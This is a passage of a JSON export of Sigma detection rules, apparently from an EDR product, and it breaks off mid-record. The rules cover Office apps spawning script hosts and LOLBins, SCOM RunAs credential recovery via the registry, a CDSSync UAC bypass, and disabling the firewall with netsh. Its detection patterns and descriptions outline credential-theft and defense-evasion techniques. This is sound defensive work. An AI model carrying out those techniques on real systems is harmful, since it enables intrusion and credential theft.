'\\rundll32.exe'\n - '\\msiexec.exe'\n - '\\msbuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - '\\AppVLP.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n # resource extraction\n - '\\extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe'\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe'\n - 'appvlp.exe'\n - 'extrac32.exe'\n\n # This is handled by the rule 686d2296-eed8-4f0a-8e68-174ea45e8902\n filter_appdata:\n ParentCommandLine|contains: '\\AppData\\'\n\n exclusion_false_positives:\n CommandLine:\n # parent is outlook\n - '*\\rundll32.exe ?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen *'\n - '*ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile*'\n - '*cryptext.dll,CryptExt*'\n - '*?:\\windows\\system32\\spool\\drivers\\\\*'\n - '*\\ZoneCentral\\zedmail.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail.dll*'\n - '*\\ZoneCentral\\zedmail32.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail32.dll*'\n - '*\\ZoneCentral\\zci.dll,*'\n - '*printui.dll,PrintUIEntry*'\n - '*shell32.dll,Control_RunDLL*srchadmin.dll*'\n # - '*c:\\windows\\system32\\mshtml.dll*' # mshtml only could permit dangerous stuff\n - '*dfshim.dll*ShOpenVerbApplication*'\n - '*\\rundll32.exe ?:\\Windows\\System32\\dfshim.dll,ShOpenVerbShortcut *'\n - '*shell32.dll,SHCreateLocalServerRunDll *{3eef301f-b596-4c0b-bd92-013beafce793}*' # Desktop Undo Manager\n # C:\\windows\\system32\\rundll32.exe C:\\windows\\syswow64\\WININET.dll,DispatchAPICall 1\n - '*\\windows\\syswow64\\WININET.dll,DispatchAPICall 1'\n - '*\\windows\\system32\\WININET.dll,DispatchAPICall 1'\n # C:\\WINDOWS\\system32\\MSIEXEC.EXE /X {AB966E92-1EB2-4BEB-81CA-6B319681B977} /QB\n - '*\\MSIEXEC.EXE /X {????????-????-????-????-????????????} /QB'\n # \"C:\\WINDOWS\\system32\\MSIEXEC.EXE\" /X {7EE8ACD7-531C-4E3E-A481-E2D468CB6DDD} /QB\n - '*\\MSIEXEC.EXE? /X {????????-????-????-????-????????????} /QB'\n - '*\\rundll32.exe ?:\\Windows\\system32\\shell32.dll,OpenAs_RunDLL *'\n - '*\\rundll32.exe shwebsvc.dll,AddNetPlaceRunDll'\n - '*\\rundll32.exe ?:\\Windows\\system32\\url.dll,MailToProtocolHandler mailto:*'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - 'cmd /c type *.txt | clip'\n - '?:\\Windows\\System32\\cmd.exe /c schtasks /delete /tn Kutools Scheduler Send /F' # https://appsource.microsoft.com/fr-fr/product/office/wa200007808?tab=overview\n - '?:\\Windows\\system32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\tmp????.tmp'\n - '?:\\Windows\\System32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\CalDavSynchronizer\\\\*\\CalDavSynchronizer.Setup.msi /passive'\n - 'cmd.exe /C taskkill/PID * /F && msiexec /norestart /uninstall {????????-????-????-????-????????????} /qr && msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\WordExpertSetup.msi TARGETDIR=?:\\APPS\\Regnology\\Word Expert? && start winword.exe'\n - 'cscript ?:\\Program Files\\Microsoft Office\\Office??\\ospp.vbs /dstatus'\n - '?:\\Windows\\System32\\cscript.exe ?:\\Program Files\\Microsoft Office\\root\\Office??\\ospp.vbs /dstatus'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\dsquery.dll,OpenSavedDsQuery *.qds'\n - '?:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3'\n - '?:\\WINDOWS\\system32\\cmd.exe /c \\\\\\\\*'\n - '?:\\windows\\System32\\WScript.exe \\\\\\\\*'\n - '?:\\Windows\\System32\\cmd.exe /C pause'\n - '?:\\WINDOWS\\system32\\cmd.exe /c D:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c E:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c F:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c G:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c L:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c Q:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c X:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c Z:\\\\*'\n - 'rundll32.exe ?:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll,InstallVstoSolution *.vsto'\n - 'cmd /c ftp -i -s:?:\\\\*\\FtpFicintrop.cfg > ?:\\\\*\\Debug.log'\n - 'cmd /c start *.pdf'\n - 'cmd /c start *.html'\n - 'cmd /c start *.jsp'\n - 'cmd /c start *.jpg'\n - '?:\\Windows\\System32\\cmd.exe /c start *.pdf'\n - '?:\\Windows\\System32\\cmd.exe /c start *.html'\n - '?:\\Windows\\System32\\cmd.exe /c start *.jsp'\n - '?:\\Windows\\System32\\cmd.exe /c start *.jpg'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.pdf'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.html'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.jsp'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.jpg'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shimgvw.dll,imageview_fullscreen *.jpg'\n\n exclusion_qgis:\n CommandLine:\n - '?:\\windows\\system32\\cmd.exe /c ?:\\PROGRA*\\QGIS*\\\\*'\n - 'CMD /C SET GDAL_DATA=?:\\Program Files\\QGIS*\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\QGIS*\\bin\\\\*'\n\n exclusion_printer:\n CommandLine|startswith:\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\System32\\mshtml.dll,PrintHTML'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\mshtml.dll,PrintHTML'\n\n exclusion_pkcs:\n CommandLine|startswith:\n - '?:\\Windows\\SysWOW64\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7'\n - '?:\\Windows\\System32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7'\n\n exclusion_photoviewer:\n CommandLine|contains:\n # \"C:\\windows\\System32\\rundll32.exe\" \"C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll\", ImageView_Fullscreen C:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\2UBOS01P\\Screenshot_20210113-145546_WhatsApp.jpg\n - '?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll'\n - '?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll'\n\n exclusion_securecrt_1:\n CommandLine|contains|all:\n - '?:\\Windows\\System32\\cmd.exe /c'\n - 'AppData'\n - 'Local'\n - 'VanDyke'\n - 'Software'\n - 'SecureCRT.exe'\n\n exclusion_securecrt_2:\n CommandLine|contains|all:\n - 'powershell -command Get-ChildItem -Path'\n - Recurse -include '\\*SecureCRT.exe' | %{Write-host $_.FullName}\n\n exclusion_securecrt_3:\n CommandLine|startswith: '?:\\Windows\\System32\\cmd.exe /c SecureCRT.exe'\n\n exclusion_office_repair_log:\n CommandLine|endswith:\n - '\\msiexec.exe /focmu {901?????-00??-0000-?000-0000000FF1CE} /lwieap ?:\\\\*\\Microsoft Office *.txt /qb+'\n - '\\msiexec.exe /focmu {901?????-00??-0000-?000-0000000FF1CE} /qb+'\n\n exclusion_activex_mail:\n CommandLine|contains:\n - '\\dwa85W.dll,MailToProtocolHandler mailto:'\n - '\\dwa9W.dll,MailToProtocolHandler mailto:'\n\n exclusion_driver_eject:\n CommandLine|startswith: '?:\\windows\\System32\\RunDll32.exe ?:\\windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification'\n\n exclusion_chrome_start:\n CommandLine: '?:\\Windows\\System32\\cmd.exe start chrome.exe'\n\n exclusion_genapi:\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Roaming\\Genapi\\Synchro\\Outlook\\RegDll-iNot.cmd ?:\\Users\\\\*\\AppData\\Local\\Apps\\'\n\n exclusion_screencapture:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shimgvw.dll,ImageView_PrintTo /pt'\n\n exclusion_choice:\n CommandLine|startswith:\n - '?:\\Windows\\SysWOW64\\cmd.exe /c choice'\n - '?:\\Windows\\System32\\cmd.exe /c choice'\n\n exclusion_udcofficeaddin:\n CommandLine: 'regsvr32 /s /n /i ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\UDCOfficeAddin*.dll'\n\n exclusion_routers_config:\n CommandLine: 'powershell -command Invoke-WebRequest -URI *http://*/cgi-bin/cvsweb/Routeurs/configs/* -UseBasicParsing | Select-Object -ExpandProperty Content'\n\n exclusion_zimbra_1:\n # Zimbra Connector for Microsoft Outlook\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\regsvr32.exe LSMSSP32.dll /s'\n - '?:\\Windows\\System32\\regsvr32.exe LSMSSP32.dll /s'\n ParentImage|endswith: '\\OUTLOOK.EXE'\n\n exclusion_zimbra_2:\n CommandLine:\n - '?:\\Windows\\SysWOW64\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\ZimbraConnectorOLK*.msi'\n - '?:\\Windows\\System32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\ZimbraConnectorOLK*.msi'\n\n exclusion_hpmsn:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\\\*\\hpmsn???.dll,MonitorPrintJobStatus '\n\n exclusion_teams:\n CommandLine|startswith: '?:\\windows\\system32\\cmd.exe /c start microsoft-edge:https://teams.microsoft.com/'\n\n exclusion_grooveutil:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\Rundll32.exe ?:\\Program Files\\Microsoft Office\\Office??\\GrooveUtil.DLL,GetResourceModulePath'\n - '?:\\WINDOWS\\system32\\Rundll32.exe ?:\\Program Files (x86)\\Microsoft Office\\Office??\\GrooveUtil.DLL,GetResourceModulePath'\n\n exclusion_poweruser:\n CommandLine|contains: 'msiexec.exe /i ?:\\Users\\\\*\\Power-user*.msi /QN'\n\n exclusion_striata:\n CommandLine|contains: 'rundll32.exe ?:\\Users\\\\*\\AppData\\Local\\Striata-Reader\\keymail.dll,OpenDocument'\n\n exclusion_hp:\n CommandLine|contains:\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files\\Hewlett-Packard\\Privacy Manager Sign and Chat\\Bin\\DPCertWorks.dll,ExpirationCheck'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files (x86)\\Hewlett-Packard\\Privacy Manager Sign and Chat\\Bin\\DPCertWorks.dll,ExpirationCheck'\n\n exclusion_sagex3:\n CommandLine|contains: '\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Sage\\SageX3OfficeAddIn.msi'\n\n exclusion_zedmail:\n CommandLine|contains:\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail\\zedmail.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail\\zedmail32.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail\\zci.dll,NPAFMRD32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail Trial\\zedmail.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail Trial\\zedmail32.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail Trial\\zci.dll,NPAFMRD32W'\n\n exclusion_circdna:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c */CircRNA profilling/circRNA matrix/Cells/Cells'\n\n exclusion_neofox:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /c *\\NeoFox Syntax Checker\\NeoFox*\\NeoFox\\scriptLauncher.bat'\n - '?:\\WINDOWS\\system32\\cmd.exe /c *\\NeoFox Syntax Checker Versions\\NeoFox *\\NeoFox\\scriptLauncher.bat'\n\n exclusion_locales:\n CommandLine:\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Set-Culture ??'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Set-TimeZone -Id ??'\n\n exclusion_inetcpl:\n CommandLine|contains|all:\n - 'RunDll32.exe InetCpl.Cpl'\n - 'ClearMyTracksByProcess'\n\n # https://s3.amazonaws.com/helpscout.net/docs/assets/583d8b88c6979106d3737d03/attachments/6194bed82b380503dfe05bb4/MIMH_FTC_GuidePublipostageVelocity.pdf\n exclusion_imhoweb:\n CommandLine|contains|all:\n - '?:\\WINDOWS\\system32\\cmd.exe /c'\n - '\\ImhowebXDocReports\\Preview\\bin?xdrtools.bat'\n - 'imhoweb.fields.xml'\n\n exclusion_inot:\n CommandLine|startswith: '?:\\windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Roaming\\Genapi\\Synchro\\Outlook\\RegDll-iNot.cmd'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f4677ab-ed23-4357-929d-c15459d867f3",
"rule_name": "Dangerous Process Started by Microsoft Office Application",
"rule_description": "Detects suspicious child processes spawned by Microsoft Office applications (Word, Excel, Powerpoint, Publisher, Visio, ...), which may indicate the execution of malicious code via phishing documents or macro abuse.\nThis behavior is commonly observed in attacks leveraging weaponized Office files to download or execute additional payloads.\nIt is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\n",
"rule_creation_date": "2020-09-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f470a12-2426-4734-b2d3-657575552dae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625562Z",
"creation_date": "2026-03-23T11:45:34.625564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625568Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/",
"https://attack.mitre.org/techniques/T1552/002/"
],
"name": "t1552_002_scom_runas_credentials_recovery_via_registry.yml",
"content": "title: SCOM RunAs Credentials Recovery via Registry\nid: 8f470a12-2426-4734-b2d3-657575552dae\ndescription: |\n Detects a recovery of the SCOM RunAs credential blobs in the registry under \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\HealthService\\Parameters\\Management Groups\\\\SSDB\\SSIDs\".\n System Center Operations Manager (SCOM), the Microsoft cross-platform data center monitoring system for operating systems and hypervisors, uses these blobs for its health service.\n Feeding the extracted blob to a tool such as SharpDPAPI would allow the actor to resolve the master key and decrypt the payload, revealing the clear-text RunAs username and password.\n It is recommended to check the related process for suspicious activities.\nreferences:\n - https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2025/12/17\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.t1555\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: ReadValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\SERVICES\\HEALTHSERVICE\\PARAMETERS\\MANAGEMENT GROUPS\\\\*\\SSDB\\SSIDS\\\\*'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\SERVICES\\HEALTHSERVICE\\PARAMETERS\\MANAGEMENT GROUPS\\\\*\\SSDB\\SSIDS\\\\*'\n\n exclusion_scom_healthservice:\n ProcessOriginalFileName: 'HealthService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f470a12-2426-4734-b2d3-657575552dae",
"rule_name": "SCOM RunAs Credentials Recovery via Registry",
"rule_description": "Detects a recovery of the SCOM RunAs credential blobs in the registry under \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\HealthService\\Parameters\\Management Groups\\\\SSDB\\SSIDs\".\nSystem Center Operations Manager (SCOM), the Microsoft cross-platform data center monitoring system for operating systems and hypervisors, uses these blobs for its health service.\nFeeding the extracted blob to a tool such as SharpDPAPI would allow the actor to resolve the master key and decrypt the payload, revealing the clear-text RunAs username and password.\nIt is recommended to check the related process for suspicious activities.\n",
"rule_creation_date": "2025-12-17",
"rule_modified_date": "2025-12-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.002",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f7af33c-6aa5-4203-abdc-0f8909589f83",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092517Z",
"creation_date": "2026-03-23T11:45:34.092519Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092523Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/AzAgarampur/byeintegrity5-uac"
],
"name": "t1548_002_uac_bypass_cdssync.yml",
"content": "title: UAC Bypass Executed via CDSSync\nid: 8f7af33c-6aa5-4203-abdc-0f8909589f83\ndescription: |\n Detects attempts to bypass UAC through the CDSSync scheduled task vulnerability.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n This technique manipulates the SystemRoot environment variable and exploits the Task Scheduler COM interface to load an unsigned npmproxy.dll, triggering elevated command execution through the CDSSync task in \\Microsoft\\Windows\\WlanSvc.\n The attack bypasses UAC by avoiding the Application Information service entirely through task scheduler abuse.\n It is recommended to verify DLL signatures in modified SystemRoot paths, and perform analysis on the unsigned DLLs.\nreferences:\n - https://github.com/AzAgarampur/byeintegrity5-uac\ndate: 2020/11/27\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - attack.execution\n - attack.t1053\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\taskhostw.exe'\n ImageLoaded|endswith: '\\npmproxy.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n exclusion_default_system_root:\n # This bypass use a custom path for %SystemRoot%.\n ImageLoaded: '?:\\Windows\\System32\\npmproxy.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f7af33c-6aa5-4203-abdc-0f8909589f83",
"rule_name": "UAC Bypass Executed via CDSSync",
"rule_description": "Detects attempts to bypass UAC through the CDSSync scheduled task vulnerability.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nThis technique manipulates the SystemRoot environment variable and exploits the Task Scheduler COM interface to load an unsigned npmproxy.dll, triggering elevated command execution through the CDSSync task in \\Microsoft\\Windows\\WlanSvc.\nThe attack bypasses UAC by avoiding the Application Information service entirely through task scheduler abuse.\nIt is recommended to verify DLL signatures in modified SystemRoot paths, and perform analysis on the unsigned DLLs.\n",
"rule_creation_date": "2020-11-27",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053",
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f81e67c-c038-4658-93ee-5173e50187a9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088389Z",
"creation_date": "2026-03-23T11:45:34.088392Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088396Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts",
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1562_004_netsh_disable_firewall.yml",
"content": "title: Windows Firewall Disabled via netsh\nid: 8f81e67c-c038-4658-93ee-5173e50187a9\ndescription: |\n Detects when netsh is used to disable the Windows firewall.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\n It is recommended to verify if the process performing this action has legitimate reasons to do it.\nreferences:\n - https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts\n - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/software/S0108/\ndate: 2021/05/07\nmodified: 2025/05/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n\n selection_cmd_1:\n CommandLine|contains|all:\n - ' advfirewall '\n - ' set '\n - ' state '\n - ' off'\n\n selection_cmd_2:\n CommandLine|contains|all:\n - ' firewall '\n - ' set '\n - ' opmode '\n - 'disable'\n # There are shortcuts for all of those, we can't rely on them\n # selection_profile:\n # CommandLine|contains:\n # - ' allprofiles '\n # - ' currentprofile '\n # - ' domainprofile '\n # - ' privateprofile '\n # - ' publicprofile '\n\n exclusion_cegedim:\n ParentImage: '?:\\Program Files (x86)\\CEGEDIM\\CLM\\Outils\\clmprerequis.exe'\n\n exclusion_altiris:\n GrandparentImage: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n exclusion_wapt:\n GrandparentImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n exclusion_ccm:\n GrandparentImage: '?:\\Windows\\CCM\\TSManager.exe'\n\n exclusion_adminarsenal:\n GrandparentImage: '?:\\Windows\\AdminArsenal\\PDQInventoryRemoteCommand\\service-?\\PDQInventoryRemoteCommand-?.exe'\n\n condition: selection_bin and 1 of selection_cmd_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f81e67c-c038-4658-93ee-5173e50187a9",
"rule_name": "Windows Firewall Disabled via netsh",
"rule_description": "Detects when netsh is used to disable the Windows firewall.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nChanges could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\nIt is recommended to verify if the process performing this action has legitimate reasons to do it.\n",
"rule_creation_date": "2021-05-07",
"rule_modified_date": "2025-05-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f83af2f-2ff6-4bcb-b0dd-db41b1a24ba7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602601Z",
"creation_date": "2026-03-23T11:45:34.602604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602612Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_propsys.yml",
